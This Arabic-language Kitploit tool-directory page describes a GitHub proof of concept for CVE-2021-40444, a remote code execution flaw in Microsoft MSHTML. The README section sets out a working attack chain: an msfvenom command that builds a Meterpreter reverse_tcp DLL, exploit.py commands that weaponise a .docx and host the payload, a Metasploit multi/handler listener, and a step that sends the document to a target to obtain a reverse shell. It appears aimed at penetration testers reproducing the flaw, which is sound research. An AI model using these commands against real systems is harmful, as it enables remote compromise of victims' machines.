Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-40444-POC — محاولة لإعادة إنتاج ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في Microsoft MSHTML باستخدام إطار Metasploit. | Kitploit
أدوات/GitHubGitHub/kagura-maru/cve-2021-40444-poc
أطر الاستغلالتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubkagura-maru/cve-2021-40444-poc

CVE-2021-40444-POC

محاولة لإعادة إنتاج ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في Microsoft MSHTML باستخدام إطار Metasploit.

عرض المستودع
1013منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-40444-POC

محاولة لإعادة إنتاج ثغرة تنفيذ التعليمات البرمجية عن بعد (RCE) في Microsoft MSHTML باستخدام إطار عمل Metasploit.

يعمل بشكل أفضل إذا لم يتم تشغيله في FlareVM

التحضير

قم باستنساخ المستودع من https://github.com/lockedbyte/CVE-2021-40444

قم بإعداد قالب .dll لاستخدامه لاحقاً مع msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll

انسخ ملف template.dll الذي تم إنشاؤه حديثاً إلى المجلد test/ من المستودع امنح صلاحية التنفيذ لـ template.dll باستخدام chmod +x template.dll

قم بتشغيل البرنامج النصي لاستخدام template.dll ومعالجته إلى

output
python3 exploit.py generate ~/test/template.dll http://<SOURCE IP>

المستمع

سيتم تصدير المستند بعد ذلك إلى مجلد out/ ويمكننا إنشاء مستمع على منفذ HTTP الخاص بنا (الافتراضي هو 80) python3 exploit.py host 80

قم بتشغيل metasploit باستخدام msfconsole -q use multi/handler set payload windows/meterpreter/reverse_tcp set lhost <SOURCE IP> run

الحمولة

ثم يمكننا إرسال document.docx إلى جهازنا الضعيف وتنفيذ ملف .docx

سنتلقى استجابة في طرفية exploit.py وتكون التجربة ناجحة إذا تمكنا من فتح قشرة tcp عكسية.

تنزيل الأداة